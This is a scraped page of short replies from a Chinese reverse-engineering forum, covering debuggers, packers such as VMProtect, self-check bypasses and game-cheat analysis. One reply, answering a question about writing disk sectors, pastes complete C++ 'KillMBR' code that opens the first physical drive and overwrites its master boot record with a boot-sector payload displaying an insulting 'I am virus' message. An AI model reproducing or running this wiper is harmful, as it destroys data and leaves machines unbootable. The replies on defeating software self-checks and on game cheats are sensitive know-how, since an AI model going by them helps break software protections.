|
[求助]求助LordPe中问题
专业解答 |
|
[求助]od调试软件求大神指导啊!!!!!
源码都给你了,还说啥,看码就妥了, |
|
[求助]关于一个简单VB程序 为何断点断不住
VB的断点有点不一样。你上网搜搜VB的断点 |
|
[求助]IoAllocateIrp 创建 IRP_MJ_WRITE 写扇区
unsigned char scode[] = "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; int CMbrDlg::KillMBR() { HANDLE hDevice; DWORD dwBytesWritten, dwBytesReturned; BYTE pMBR[512] = {0}; // 重新构造MBR memcpy(pMBR, scode, sizeof(scode) - 1); pMBR[510] = 0x55; pMBR[511] = 0xAA; hDevice = CreateFile ( "\\\\.\\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if (hDevice == INVALID_HANDLE_VALUE) return -1; DeviceIoControl ( hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL ); // 写入病毒内容 WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); DeviceIoControl ( hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL ); CloseHandle(hDevice);貌似我看到有这样的代码,不知道能帮上你不 |
|
|
|
新人求教
这东西反汇编,是要靠一些实际的数值进行揣摩的,光看代码我功力不够 |
|
这个软件好像加了自校验,改一个字节都无法运行,也无法用ollydbg跟踪
学习了,注入DLL应该是动态修改那块代码 |
|
程序自校验
都Vmp了,估计没什么悬念了。 |
|
新人求教
大概是字符串操作相关。 |
|
|
|
|
|
[原创]《地下城》双开辅助逆向分析
楼主写的很详细,有值得学习的地方 |
|
求助这是什么壳?
貌似vmp但不知道是什么版本 |
|
外挂call技术的原理是什么
可能是导出函数,你看看导出函数 |
|
|
|
[求助]如何跟踪[ebp--xx],[ebp+xx]
是的,就要看什么操作堆栈 |
|
ollyice编译后提示“程序已被破坏,无法正常运行”
有意思啊。。。。。。。这样过自校验 |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值